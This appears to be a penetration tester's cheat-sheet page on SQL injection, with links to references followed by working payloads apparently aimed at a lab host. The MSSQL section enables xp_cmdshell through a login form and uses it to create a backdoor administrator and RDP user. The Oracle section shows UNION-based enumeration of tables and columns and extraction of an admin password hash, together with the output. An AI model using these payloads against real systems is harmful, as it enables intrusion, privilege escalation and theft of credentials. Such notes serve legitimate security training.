SQL Injection

MSSQL

Full MSSQL Injection PWNageExploit Database

Union based Oracle Injectionwww.securityidiots.com

What is Blind SQL Injection? Tutorial & Examples | Web Security AcademyWebSecAcademy

MSSQL Injection Cheat Sheetpentestmonkey

MSSQL INJECTION EXAMPLE
## LOGIN-FORM
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test' or '1'='1
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; IF (1=1) WAITFOR DELAY '0:0:10'--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; WAITFOR DELAY '0:0:10'--

http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC sp_configure 'show advanced options', 1;--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; RECONFIGURE;--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC sp_configure 'xp_cmdshell', 1;--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; RECONFIGURE;--

http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC xp_cmdshell 'net user gerh Pass123 /add';--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC xp_cmdshell 'net localgroup Administrators gerh /add';--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC xp_cmdshell 'net localgroup "Remote Desktop Users" gerh /add';--


http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC sp_addlogin 'user', 'pass';-- 

SQL ORACLE EXAMPLE
' or '1'='1
' order by 3--
' order by 4-- == RETORNA ERROR
' UNION SELECT 1, 1, 1--
' UNION SELECT 1, 1, 1 from dual--
' UNION SELECT null, null, null from dual--

' UNION SELECT 'XXX', 'ZZZ', null from dual--

' UNION SELECT 'XXX', sys.database_name, null from dual--
Blog entry from XXX with title XE from 0

' UNION SELECT 'XXX', (select banner from v$version where rownum=1), null from dual--
Blog entry from XXX with title Oracle Database 18c Express Edition Release 18.0.0.0.0 - Production from 0

' UNION SELECT 'XXX', table_name, null from all_tables--
Blog entry from XXX with title ALL_UNIFIED_AUDIT_ACTIONS from 0
Blog entry from XXX with title AUDIT_ACTIONS from 0
Blog entry from XXX with title AV_DUAL from 0
Blog entry from XXX with title AW$AWCREATE from 0

' UNION SELECT 'XXX', column_name, null from all_tab_columns where table_name='WEB_USERS'--
Blog entry from XXX with title PASSWORD from 0
Blog entry from XXX with title USER_ID from 0
Blog entry from XXX with title USER_NAME from 0

' UNION SELECT 'XXX', column_name, null from all_tab_columns where table_name='WEB_ADMINS'--
Blog entry from XXX with title ADMIN_ID from 0
Blog entry from XXX with title ADMIN_NAME from 0
Blog entry from XXX with title PASSWORD from 0


' UNION SELECT 'XXX', ADMIN_NAME||PASSWORD, null from WEB_ADMINS--
Blog entry from XXX with title admind82494f05d6917ba02f7aaa29689ccb444bb73f20380876cb05d1f37537b7892 from 0

Using SQL Injection to Bypass Authentication - PortSwiggerportswigger.net